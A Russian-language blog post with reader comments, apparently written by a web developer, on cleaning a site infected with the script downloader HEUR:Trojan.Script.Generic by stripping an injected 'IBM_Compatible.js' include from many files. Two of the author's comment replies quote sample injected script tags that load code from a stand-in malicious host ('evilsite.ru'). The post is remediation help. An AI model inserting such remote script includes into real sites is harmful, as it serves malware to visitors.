Однажды утром, я сидел и верстал очередной сайт, как вдруг… мне приходит письмо от заказчика предыдущего, в котором он говорит, что на сайте вирус HEUR:Trojan.Script.Generic и каспер его не пускает.

Я в шоке начал гуглить, что за вирус. Оказалось, что это троян-даунлоадер, то есть сама по себе софтина безвредная, но загружает посетителю сайта вирусню.

Сайт был полностью слит и проверен антивирусом, результат — ни-че-го. Как оказалось, пока сайт не запущен через браузер, никаких вирусов нет. Это происходит из-за того, что весь вирус это проста строчка в коде.

После поиска по всем файлам сайта, а это около 3000 файлов с учетом CMS и встроенного phpMyAdmin заражены, оказались около 150 файлов. Вирус атакует в основном файлы с именем index.* или с расширением .js и дописывается свой код в конец файла.

Для лечения я использовал notepad++.

Если вы тоже столкнулись с этим вирусом на своем сайте, то вам может, пригодится моя инструкция по лечению.

Пошаговая инструкция:

  1. весь сайт был скачан ко мне на компьютер
  2. в папке с сайтом был произведен поиск в файлах строки «IBM_Compatible.js»
  3. все файлы из результатов поиска открыты в notepad++ простым нажатием ctrl+A в результатах поиска, и перетаскиванием выделенных файлов в открытое окно notepad++
  4. в notepad++ нажимаем ctrl+H, копируем строку подключения вируса, а поле заменить оставляем пустым
  5. нажимаем волшебную кнопку «заменить во всех открытых документах» и вирус с позором изгнан из всех файлов
  6. сохраняем изменения во всех файлах
  7. заливаем их обратно на сервер, принудительно перезаписывая имеющиеся
  8. повторно проходимся по главной странице и индексным в подразделах, админке и phpMyAdmin при их наличии
  9. при обнаружении остатков вируса, чистим их, вручную удаляя строки из файлов
  10. радуемся, что так легко победили зловреда
  11. Проверяем антивирусом все компы с которых подключались по фтп к сайту
  12. меняем пароли доступа к фтп

Разумеется, это все можно было бы упросить, например, сделав все эти действия скриптом или используя grep на сервере, но в данном случае, главной целью был результат.

На этом все, надеюсь, материал оказался полезным для вас.

А если вы не хотите заморачиваться самостоятельной чисткой, то вы можете заказать ее воспользовавшись формой ниже.

О борьбе с вирусом HEUR:Trojan.Script.Generic

28 комментариев к “О борьбе с вирусом HEUR:Trojan.Script.Generic

  • 12.12.2012 в 12:22
    Постоянная ссылка

    Прошу прощения, а можно поподробнее для особо одоренных, я не понимаю что такое notepad++ , «IBM_Compatible.js». Блоги делать научилась совсем недавно а дальше все для меня как китайская грамота.
    А вирус этот поймала — каспер сказал.
    Буду благодарна за индивидуальную консультацию.
    С уважением Людмила Плехова.

    Ответить
    • 14.12.2012 в 13:22
      Постоянная ссылка

      Людмила, notepad++ это текстовый редактор, типа блокнота в windows, но более функциональный. IBM_Compatible.js это имя скрипта который может подключать вирус на вашем сайте, и поиском по этой строчке вы сможете найти файлы где подключается вирус.

      Ответить
  • 25.12.2012 в 20:18
    Постоянная ссылка

    А можно побуквенно порядок действий, так как все равно каспер не открывает мой блог.
    Я видно что-то не так сделала.
    С уважением Людмила Плехова.

    Ответить
    • 26.12.2012 в 12:14
      Постоянная ссылка

      Людмила, а в чем конкретно сложность? Я и так постарался максимально подробно все расписать, на каком этапе у вас возникли сложности?
      ЗЫ при необходимости могу помочь с решением данной проблемы на платной основе, если вас это интересует пишите на order@coder-diary.ru

      Ответить
  • 26.12.2012 в 13:06
    Постоянная ссылка

    notepad++ я установила , а как «в папке с сайтом был произведен поиск в файлах строки «IBM_Compatible.js»» это физически сделать?

    Ответить
  • 27.12.2012 в 14:22
    Постоянная ссылка

    Действительно очень нужная информация, но только для тех кто понимает как этим пользоваться. У меня вот тоже такая же проблема, однако этот текст для меня как для китайца — ничего не понимаю. Вернее понимаю, что сама я это не осилю, а помочь некому. А можно ли обойтись без этих манипуляций? И почему вообще такая штука происходит? У меня уже мозг кипит, неделю ковыряюсь, спасибо доброму человеку — к Вам вот направил…

    Ответить
    • 27.12.2012 в 15:07
      Постоянная ссылка

      Чтобы вести какую-то серьезную деятельность в интернете надо или учиться и разбираться в технических деталях или платить тем кто разбирается. Как и в жизни, если сломалась машина, кто умеет чинит сам, кто не умеет едет в автосервис))

      > И почему вообще такая штука происходит?
      Происходит это в большинстве случаев по следующим причинам:
      1) не надежные пароли на доступ к сайту/FTP/хостингу
      2) не надежные программы для доступа типа фтп-клиентов и браузеров и вирусы на компьютере
      3) плохой хостинг (мелкие хостеры могут иметь плохо настроенные серверы, но это встречается довольно редко)
      4) все остальные случаи типа целенаправленных взломов, равпространения вирусов через коду партнерок и баннерных сетей итп (это думаю меньше 1% случаев)

      Ответить
  • 27.12.2012 в 16:30
    Постоянная ссылка

    Ну ведь каждый специалист с чего-то начинал… 🙂
    Я Вам на почту выслала письмо с просьбой…

    Ответить
  • 28.12.2012 в 17:38
    Постоянная ссылка

    Юмор этой ситуации в том, что интернет забит рекламой типа-Блог за один день, или легкий интернет бизнес, а в результате купить или заказать блог можно легко, но если ты не умеешь им пользоваться, не знаешь как это работает, то зависаешь надолго.
    А теперь по теме: скачала, почистила касперским, закачала назад, а касперский кричит -вирусы.

    Ответить
    • 28.12.2012 в 18:07
      Постоянная ссылка

      Вся подобная реклама имеет одну цель — продать свой товар/курс и привлечь к себе трафик, подписчиков итп. Если кому-то ее станет от этого лучше, то ему повезло.
      Научиться какой-то новой для себя деятельности за день-неделю-месяц почти не реально, можно поверхностно изучить какие-то основы, но достичь серьезных результатов скорее всего удастся.

      > скачала, почистила касперским, закачала назад, а касперский кричит -вирусы.

      все правильно, на сайте вирусов нет, поэтому касперу нечего удалять.
      В коде сайта есть строчка при открытии страницы подключающая вирус типа <script scr="http;//evilsite.ru/virus.js " /> при загрузки страницы на нее по этой ссылке подгружается вирус на который и реагирует каспер.

      Ответить
  • 06.01.2013 в 16:12
    Постоянная ссылка

    Наконец-то этот кошмар закончился. Касперский написал, что блог чист и свободен.
    С одной стороны я узнала очень много нового, накачала свои блоги разными антиспамовскими программами, очень боялась, что они будут мешать друг другу, так что пришлось перелопатить большой объем информации.
    С другой стороны все на блогах тормознулось, упал трафик и все надо начинать сначала.
    Зато есть опыт и я знаю теперь путь короче.
    Хочу поблагодарить вас и многих других блоггеров за вашу работу, за ту информацию, которую вы размещаете на своих блогах, а так же пожелать в Новом Году успехов, достижений и наград.

    Ответить
  • 15.02.2013 в 10:20
    Постоянная ссылка

    доброго дня. Спасибо за пост, весьма в тему. Вопрос — как вы определили. что искать нужно именно по IBM_Compatible.js ? у меня этот поиск не дал никакого результата, как и скан антивирусом всего сайта. Вот только яндекс говорит что там вирус, и периодически разные антивирусы на разных компах воют при открытии сайта.
    заранее спасибо!

    Ответить
    • 15.02.2013 в 10:53
      Постоянная ссылка

      Здравствуйте.
      В моем случае в js файлах была дописана строчка подключающая этот файл, типа т.е. script src=’зловредный сайт/IBM_Compatible.js’. Соответственно найдя ее в нескольких файлах руками я запустил поиск по ней. В вашем случае файл вполне может называться по-другому или вообще быть шифрованным.

      Ответить
  • 06.05.2013 в 12:30
    Постоянная ссылка

    Здравствуйте, скажите чайнику -пользователю творческого сайта, такой сайт открывать не стоит? Или это все же не вирус, а просто паника Касперского…Пользовалась одним сайтом в течении года, а теперь не могу зайти внезапно появилось такое сообщение от каспера(((

    Ответить
    • 06.05.2013 в 13:14
      Постоянная ссылка

      Здравствуйте, Лена.
      Это не ложное срабатывание, касперский сперва сам подгружает страницу и проверяет ее, а потом уже выносит решение о блокировке.
      Возможно там «всего лишь» редирект на сайт с порно/предложением обновить антивирус или браузер/предложениями откосить от армии/гаи/чего-то еще.
      Т.е. вполне возможно, вы перейдете на сайт, вам откроется новое окно с левым сайтом и вы спокойно сможете пользоваться сайтом, но есть вероятность, что сайт попытается незаметно загрузить к вам на компьютер вирус.
      Попробуйте проверить сайт через https://www.virustotal.com/ru/#url там проверка примерно 50 антивирусами, может и реально глюк касперского.

      Ответить
  • 30.05.2013 в 22:57
    Постоянная ссылка

    Большое спасибо! Ваша информация действительно помогла.Успехов Вам во всех начинаниях!

    Ответить
  • 01.11.2013 в 14:15
    Постоянная ссылка

    Здравствуйте. Возникла такая же проблема. Скачал папку public_html на комп и касперский сразу удалил файл class-wp-filesystem-index.php по пути public_html\wp-admin\includes, можете подсказать что это за файл и можно ли его удалить или как то отредактировать? Спасибо за помощь.

    Ответить
    • 01.11.2013 в 20:52
      Постоянная ссылка

      Игорь, скорее всего этот файл и есть троян. Проверьте дату создания файла и файл .htaccess в корне, этот вирус может дописывать в него левый код.

      Ответить
  • 02.11.2013 в 21:32
    Постоянная ссылка

    Да, дата этого файла у меня 14.09.12, а всех остальных файлов в этой папке 24.09.13, на целый год разница, это что то значит? И как раз проверил через онлайн сканер доктора веба, он говорит что мой сайт перенаправляет на сайт левый — мобилемастер какой то и как раз адрес этого мобилемастера я нашел в файле .htaccess. Я еще раньше замечал при заходе со смартфона на свой сайт, что если включена мобильная версия сайта то сразу перенаправляло на другой сайт где предлагали обновить браузер, я тогда не придал этому большого значения и каспер не ругался ни когда, а тут вот неделю назад стал блокировать мой сайт. Подскажите пожалуйста что мне делать с этими двумя файлами (class-wp-filesystem-index.php , .htaccess), их можно удалить или надо редактировать их?

    Ответить
    • 02.11.2013 в 22:17
      Постоянная ссылка

      В .htaccess надо по удалять лишние правила которые делают переадресацию, а в class-wp-filesystem-index.php надо смотреть, что там, может надо полностью удалить файл, а может почистить из него код вируса.
      Ну и желательно обновить вордпресс и плагины и поменять пароли на ftp т.к. заражение скорее всего через дырявый клиент.
      А после этого стоит провести полную проверку сайта т.к. могут быть еще зараженные файлы.

      Ответить
  • 06.11.2013 в 14:05
    Постоянная ссылка

    .htaccess вернул из старой копии (хорошо, на компе одна старая копия была), class-wp-filesystem-index.php удалил так его в старой копии ваще не было, у меня пароль от сайта в браузере был сохранен, может поэтому вирус залез, клиентами я не пользовался ни какими, только через сайт хостинга заходил всегда. Просканировал заново онлайн сканером доктор веба, говорит все чисто теперь, и на комп скачал public_html каспером проверил — все чисто. Но на сайт каспер по прежнему не пускает, так же говорит — троян. Что с этим можно сделать?

    Ответить
    • 06.11.2013 в 14:19
      Постоянная ссылка

      Тогда надо проверять js файлы, возможно где-то в них дописан левый код. Надо смотреть на какие файлы ругается каспер при заходе на сайт и проверять их.

      Ответить
  • 06.11.2013 в 14:34
    Постоянная ссылка

    Это уже проблема, их там куча и кода километры, еще и знать надо какой код левый может быть. А когда на сайт заходишь он не пишет какие файлы ему не нравятся. Просто пишет «Обнаружено: HEUR:Trojan.Script.Generic»

    Ответить
  • 31.12.2013 в 18:17
    Постоянная ссылка

    Все таки разобрался я с этим вирусом, теперь каспер не ругается. Чисто случайно заметил, что когда новую тему активирую на сайте то он нормально открывается, а со старыми темами которые были не открывался, каспер не давал, вот я тогда и допер что в файлах темы вирус значит, по датам изменения файлов посмотрел и которые были позже остальных изменены сравнил с оригиналом и нашел в файле header.php несколько левых строк в которых был сайт левый прописан, на него и ругался каспер, удалил этот кусок и все ОК стало.

    Ответить

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

90% сайтов рунета содержат уязвимости и могут быть взломаны! Проверь свой сайт!